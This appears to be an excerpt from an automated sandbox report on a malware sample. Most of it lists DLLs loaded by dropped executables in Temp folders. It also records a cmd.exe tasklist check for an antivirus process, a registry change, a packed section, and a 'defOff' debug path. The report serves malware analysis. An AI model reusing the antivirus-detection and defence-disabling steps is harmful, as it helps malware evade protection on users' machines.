Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2900480 > 1048576
Source: file.exe Static PE information: Raw size of xtefpcuz is bigger than: 0x100000 < 0x298800
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: is-5MQTR.tmp.11.dr
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: is-5MQTR.tmp.11.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: FT773VWATWFL9SRK5RTU4.exe, 00000002.00000003.1848208544.0000000005050000.00000004.00001000.00020000.00000000.sdmp, FT773VWATWFL9SRK5RTU4.exe, 00000002.00000002.1981148495.0000000000A52000.00000040.00000001.01000000.00000006.sdmp
